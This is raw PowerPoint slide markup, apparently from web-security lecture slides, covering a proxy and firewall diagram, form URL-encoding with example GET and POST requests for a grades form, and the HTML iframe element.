            <a:off x="2514600" y="2623526"/>
            <a:ext cx="1368747"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Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714765" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2126998" y="3596882"/>
            <a:ext cx="775202" cy="292676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="83598" tIns="41799" rIns="83598" bIns="41799">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="96000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="657225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714766" name="Oval 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2185989" y="3124779"/>
            <a:ext cx="788987" cy="351234"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E4E4E4"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gra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Tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714767" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2794975"/>
            <a:ext cx="685800" cy="415529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12361"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="595959"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="808080"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gra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Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714768" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3252176"/>
            <a:ext cx="990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69" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2966426"/>
            <a:ext cx="1368747"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Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714770" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3200400" y="3423626"/>
            <a:ext cx="990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71" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3480776"/>
            <a:ext cx="1261884"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Cached Reply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714772" name="Oval 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267201" y="3137876"/>
            <a:ext cx="735013" cy="311944"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E4E4E4"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gra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Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714773" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5181600" y="2909276"/>
            <a:ext cx="533400" cy="2857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74" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="3080726"/>
            <a:ext cx="533400" cy="2857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75" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4213985" y="3627339"/>
            <a:ext cx="1156279" cy="292676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="83598" tIns="41799" rIns="83598" bIns="41799">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="96000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="657225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proxy Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998267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application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All name-value pairs of the form are encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encodes the name-value pairs using percent encoding </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Except that spaces are translated to + instead of %20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>foo=bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple name-value pairs separated by ampersand (&amp;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="659867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application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/grades/submit" &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="student" value="bar"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="class"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="grade"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>submit?student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>John+Doe&amp;class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=cs+279&amp;grade=A%2B&amp;submit=Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2890621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application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/grades/submit" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="student”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="class"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="grade"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>POST /grades/submit HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/5.0 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xhtml+xml,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Content-Length: 65</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>student=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>John+Doe&amp;class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=CS+279&amp;grade=A%2B&amp;submit=Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1071175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iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Element</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allow for the display of a separate website within a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These are used, for example to display ads or to integrate external functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>=”http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.cs.ucsb.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" name=”home" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frameBorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="0"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frame.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>" name="frame" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frameBorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
